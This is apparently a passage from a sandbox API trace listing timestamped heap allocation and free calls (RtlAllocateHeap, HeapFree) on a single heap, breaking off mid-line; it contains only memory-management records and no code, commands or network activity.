[0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x12) returned 0xc0a628 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a8e8 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06570 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc05480 [0245.295] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a628 | out: hHeap=0xbe0000) returned 1 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a900 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a918 [0245.295] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a8e8 | out: hHeap=0xbe0000) returned 1 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a8e8 [0245.295] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa) returned 0xc0a930 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a948 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc130e0 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a948 | out: hHeap=0xbe0000) returned 1 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc130e0 | out: hHeap=0xbe0000) returned 1 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a930 | out: hHeap=0xbe0000) returned 1 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a930 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a948 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xe) returned 0xc0a960 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a978 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a990 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc130e0 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a960 | out: hHeap=0xbe0000) returned 1 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a960 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0a9a8 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a978 | out: hHeap=0xbe0000) returned 1 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a978 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a9c0 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x80) returned 0xc134b8 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf22d0 | out: hHeap=0xbe0000) returned 1 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a9d8 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a9f0 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0aa08 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0aa20 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc130f0 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a9f0 | out: hHeap=0xbe0000) returned 1 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0a9f0 [0245.296] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0aa38 [0245.296] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa08 | out: hHeap=0xbe0000) returned 1 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0aa08 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0aa50 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0aa68 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xe) returned 0xc0aa80 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0aa98 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc0aab0 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13100 [0245.297] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa80 | out: hHeap=0xbe0000) returned 1 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0aa80 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13558 [0245.297] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa98 | out: hHeap=0xbe0000) returned 1 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc0aa98 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13570 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13588 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xc0a628 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc135a0 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc065c0 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13110 [0245.297] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a628 | out: hHeap=0xbe0000) returned 1 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc135b8 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc135d0 [0245.297] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc135a0 | out: hHeap=0xbe0000) returned 1 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc135a0 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc135e8 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13600 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13618 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13630 [0245.297] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13648 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13120 [0245.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13618 | out: hHeap=0xbe0000) returned 1 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13618 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13660 [0245.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13630 | out: hHeap=0xbe0000) returned 1 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13630 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13678 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x100) returned 0xc13940 [0245.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc134b8 | out: hHeap=0xbe0000) returned 1 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13690 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06610 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc136a8 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06638 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13130 [0245.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06610 | out: hHeap=0xbe0000) returned 1 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc136c0 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc136d8 [0245.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc136a8 | out: hHeap=0xbe0000) returned 1 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc136a8 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2) returned 0xc13140 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc136f0 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13708 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13150 [0245.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13140 | out: hHeap=0xbe0000) returned 1 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13720 [0245.298] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13738 [0245.298] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc136f0 | out: hHeap=0xbe0000) returned 1 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc136f0 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1c) returned 0xc06610 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13750 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06660 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13140 [0245.299] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc06610 | out: hHeap=0xbe0000) returned 1 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13768 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13780 [0245.299] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13750 | out: hHeap=0xbe0000) returned 1 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13750 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13798 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137b0 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137c8 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137e0 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xac) returned 0xc13a48 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137f8 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13810 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13828 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13840 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13858 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13870 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13888 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc138a0 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc138b8 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc138d0 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc138e8 [0245.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13900 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13918 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13b18 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13b30 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13b48 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13b60 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13b78 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13b90 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13ba8 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13bc0 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13bd8 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13bf0 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13c08 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13c20 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13c38 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13c50 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13c68 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13c80 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13c98 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13cb0 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13cc8 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13ce0 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13cf8 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13d10 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13d28 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13d40 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13d58 [0245.300] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13d70 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13d88 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13da0 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13db8 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13dd0 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13de8 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13e00 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13e18 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13e30 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13e48 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13e60 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13e78 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13e90 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13ea8 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13ec0 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13ed8 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13f18 [0245.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13f30 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a6f0 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a7b0 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a798 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a780 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a810 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a7c8 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a7e0 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a870 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a828 | out: hHeap=0xbe0000) returned 1 [0245.301] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a840 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a8d0 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a8b8 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a888 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a918 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a900 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a8e8 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a930 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a948 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a9a8 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a960 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a978 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a9c0 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a9d8 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa38 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a9f0 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa08 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa50 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa68 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13558 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa80 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0aa98 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13570 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13588 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc135d0 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc135b8 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc135a0 | out: hHeap=0xbe0000) returned 1 [0245.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc135e8 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13600 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13660 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13618 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13630 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13678 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13690 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc136d8 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc136c0 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc136a8 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13738 | out: hHeap=0xbe0000) returned 1 [0245.303] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13720 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc136f0 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13780 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13768 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13750 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13798 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137b0 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137c8 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137e0 | out: hHeap=0xbe0000) returned 1 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137e0 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc137c8 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13160 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137c8 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13160 | out: hHeap=0xbe0000) returned 1 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137e0 | out: hHeap=0xbe0000) returned 1 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137e0 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x14) returned 0xc0a628 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc137c8 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06610 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13160 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc0a628 | out: hHeap=0xbe0000) returned 1 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137b0 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13798 [0245.304] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137c8 | out: hHeap=0xbe0000) returned 1 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc137c8 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc06688 [0245.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13750 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc13768 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc13780 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xc136f0 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137e0 | out: hHeap=0xbe0000) returned 1 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc13798 | out: hHeap=0xbe0000) returned 1 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137b0 | out: hHeap=0xbe0000) returned 1 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137c8 | out: hHeap=0xbe0000) returned 1 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xc13170 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xc137c8 [0245.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc13180 [0245.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc137c8 | out: 